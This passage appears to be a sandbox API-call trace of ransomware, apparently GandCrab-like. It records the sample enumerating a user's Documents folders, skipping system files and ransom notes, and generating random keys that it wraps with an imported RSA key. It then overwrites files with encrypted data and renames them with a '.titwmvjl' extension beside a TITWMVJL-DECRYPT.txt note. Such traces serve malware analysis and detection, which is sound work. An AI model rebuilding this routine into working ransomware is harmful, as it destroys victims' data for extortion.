(lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\vtDv KkQvZ_mFSwACuc.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\vtdv kkqvz_mfswacuc.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0090.695] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.695] ReadFile (in: hFile=0x2d4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0090.695] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.695] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.695] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0090.696] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.696] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.696] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.696] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0090.697] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.697] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.697] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.697] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.697] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0090.697] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.698] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.698] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.698] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0090.698] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.698] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.698] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.698] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.699] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0090.699] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.699] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503738) returned 1 [0090.700] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.700] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0090.700] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.700] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0090.700] GetLastError () returned 0x0 [0090.700] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.700] CryptDestroyKey (hKey=0x503738) returned 1 [0090.700] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.700] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.700] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.701] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0090.701] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.701] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x5038f8) returned 1 [0090.701] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.701] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0090.701] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.701] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0090.702] GetLastError () returned 0x0 [0090.702] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.702] CryptDestroyKey (hKey=0x5038f8) returned 1 [0090.702] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.702] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.702] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0090.702] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0090.702] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0x15e15, lpOverlapped=0x0) returned 1 [0090.711] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffea1eb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.711] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x15e15, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0x15e15, lpOverlapped=0x0) returned 1 [0090.713] WriteFile (in: hFile=0x2d4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0090.715] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.719] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.720] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.720] CloseHandle (hObject=0x2d4) returned 1 [0090.721] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\vtDv KkQvZ_mFSwACuc.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\vtdv kkqvz_mfswacuc.docx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\vtDv KkQvZ_mFSwACuc.docx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\vtdv kkqvz_mfswacuc.docx.titwmvjl"), dwFlags=0x1) returned 1 [0090.722] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.722] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 0 [0090.722] FindClose (in: hFindFile=0x5036f8 | out: hFindFile=0x5036f8) returned 1 [0090.723] CloseHandle (hObject=0x2cc) returned 1 [0090.723] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0090.723] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0090.723] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0090.723] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\TITWMVJL-DECRYPT.txt" [0090.723] lstrlenW (lpString=".titwmvjl") returned 9 [0090.723] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\TITWMVJL-DECRYPT.txt") returned 107 [0090.723] VirtualAlloc (lpAddress=0x0, dwSize=0x116, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.724] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 116 [0090.724] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\TITWMVJL-DECRYPT.txt") returned 107 [0090.724] lstrlenW (lpString=".txt") returned 4 [0090.724] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.724] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0090.724] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0090.724] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.724] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\TITWMVJL-DECRYPT.txt") returned 107 [0090.724] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\TITWMVJL-DECRYPT.txt") returned 107 [0090.724] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0090.724] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0090.724] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0090.724] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0090.724] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0090.724] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0090.724] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0090.724] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0090.724] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.725] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0090.725] lstrcmpW (lpString1="UiqWmFHO_sEKaTitan.pptx", lpString2=".") returned 1 [0090.725] lstrcmpW (lpString1="UiqWmFHO_sEKaTitan.pptx", lpString2="..") returned 1 [0090.725] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\", lpString2="UiqWmFHO_sEKaTitan.pptx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\UiqWmFHO_sEKaTitan.pptx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\UiqWmFHO_sEKaTitan.pptx" [0090.725] lstrlenW (lpString=".titwmvjl") returned 9 [0090.725] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\UiqWmFHO_sEKaTitan.pptx") returned 110 [0090.725] VirtualAlloc (lpAddress=0x0, dwSize=0x11c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.725] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\UiqWmFHO_sEKaTitan.pptx.titwmvjl") returned 119 [0090.725] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\UiqWmFHO_sEKaTitan.pptx") returned 110 [0090.725] lstrlenW (lpString=".pptx") returned 5 [0090.725] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.725] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".pptx ") returned 6 [0090.725] lstrcmpiW (lpString1=".pptx", lpString2=".titwmvjl") returned -1 [0090.725] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.726] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\UiqWmFHO_sEKaTitan.pptx") returned 110 [0090.726] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\UiqWmFHO_sEKaTitan.pptx") returned 110 [0090.726] lstrcmpiW (lpString1="UiqWmFHO_sEKaTitan.pptx", lpString2="desktop.ini") returned 1 [0090.726] lstrcmpiW (lpString1="UiqWmFHO_sEKaTitan.pptx", lpString2="autorun.inf") returned 1 [0090.726] lstrcmpiW (lpString1="UiqWmFHO_sEKaTitan.pptx", lpString2="ntuser.dat") returned 1 [0090.726] lstrcmpiW (lpString1="UiqWmFHO_sEKaTitan.pptx", lpString2="iconcache.db") returned 1 [0090.726] lstrcmpiW (lpString1="UiqWmFHO_sEKaTitan.pptx", lpString2="bootsect.bak") returned 1 [0090.726] lstrcmpiW (lpString1="UiqWmFHO_sEKaTitan.pptx", lpString2="boot.ini") returned 1 [0090.726] lstrcmpiW (lpString1="UiqWmFHO_sEKaTitan.pptx", lpString2="ntuser.dat.log") returned 1 [0090.726] lstrcmpiW (lpString1="UiqWmFHO_sEKaTitan.pptx", lpString2="thumbs.db") returned 1 [0090.726] lstrcmpiW (lpString1="UiqWmFHO_sEKaTitan.pptx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0090.726] lstrcmpiW (lpString1="UiqWmFHO_sEKaTitan.pptx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0090.726] lstrcmpiW (lpString1="UiqWmFHO_sEKaTitan.pptx", lpString2="KRAB-DECRYPT.html") returned 1 [0090.726] lstrcmpiW (lpString1="UiqWmFHO_sEKaTitan.pptx", lpString2="CRAB-DECRYPT.html") returned 1 [0090.726] lstrcmpiW (lpString1="UiqWmFHO_sEKaTitan.pptx", lpString2="KRAB-DECRYPT.txt") returned 1 [0090.726] lstrcmpiW (lpString1="UiqWmFHO_sEKaTitan.pptx", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.726] lstrcmpiW (lpString1="UiqWmFHO_sEKaTitan.pptx", lpString2="ntldr") returned 1 [0090.726] lstrcmpiW (lpString1="UiqWmFHO_sEKaTitan.pptx", lpString2="NTDETECT.COM") returned 1 [0090.726] lstrcmpiW (lpString1="UiqWmFHO_sEKaTitan.pptx", lpString2="Bootfont.bin") returned 1 [0090.726] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\UiqWmFHO_sEKaTitan.pptx") returned 110 [0090.726] lstrlenW (lpString=".pptx") returned 5 [0090.726] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.726] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".pptx ") returned 6 [0090.727] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.727] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.727] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\UiqWmFHO_sEKaTitan.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\uiqwmfho_sekatitan.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0090.727] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.728] ReadFile (in: hFile=0x2cc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ea20*=0x21c, lpOverlapped=0x0) returned 1 [0090.728] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.728] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.728] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4c9980) returned 1 [0090.729] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.729] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.729] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.729] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0090.729] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.729] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.729] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.729] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.730] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4c9980) returned 1 [0090.730] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.730] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.730] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.730] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0090.731] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.731] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.731] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.731] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.731] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4c9980) returned 1 [0090.731] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.731] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5038f8) returned 1 [0090.732] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.732] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0090.732] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.732] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e974*=0x100) returned 1 [0090.732] GetLastError () returned 0x0 [0090.732] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.732] CryptDestroyKey (hKey=0x5038f8) returned 1 [0090.732] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.733] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.733] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.733] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4c9980) returned 1 [0090.733] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.733] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503978) returned 1 [0090.733] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.733] CryptGetKeyParam (in: hKey=0x503978, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0090.733] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.734] CryptEncrypt (in: hKey=0x503978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e974*=0x100) returned 1 [0090.734] GetLastError () returned 0x0 [0090.734] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.734] CryptDestroyKey (hKey=0x503978) returned 1 [0090.734] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.734] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.734] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0090.734] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0090.735] ReadFile (in: hFile=0x2cc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ea20*=0x3117, lpOverlapped=0x0) returned 1 [0090.740] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xffffcee9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.740] WriteFile (in: hFile=0x2cc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x3117, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ea04*=0x3117, lpOverlapped=0x0) returned 1 [0090.741] WriteFile (in: hFile=0x2cc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0090.742] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.746] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.747] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.747] CloseHandle (hObject=0x2cc) returned 1 [0090.748] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\UiqWmFHO_sEKaTitan.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\uiqwmfho_sekatitan.pptx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\UiqWmFHO_sEKaTitan.pptx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\uiqwmfho_sekatitan.pptx.titwmvjl"), dwFlags=0x1) returned 1 [0090.748] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.749] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0090.749] lstrcmpW (lpString1="XN6 EA.pdf", lpString2=".") returned 1 [0090.749] lstrcmpW (lpString1="XN6 EA.pdf", lpString2="..") returned 1 [0090.749] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\", lpString2="XN6 EA.pdf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\XN6 EA.pdf") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\XN6 EA.pdf" [0090.749] lstrlenW (lpString=".titwmvjl") returned 9 [0090.749] lstrlenW 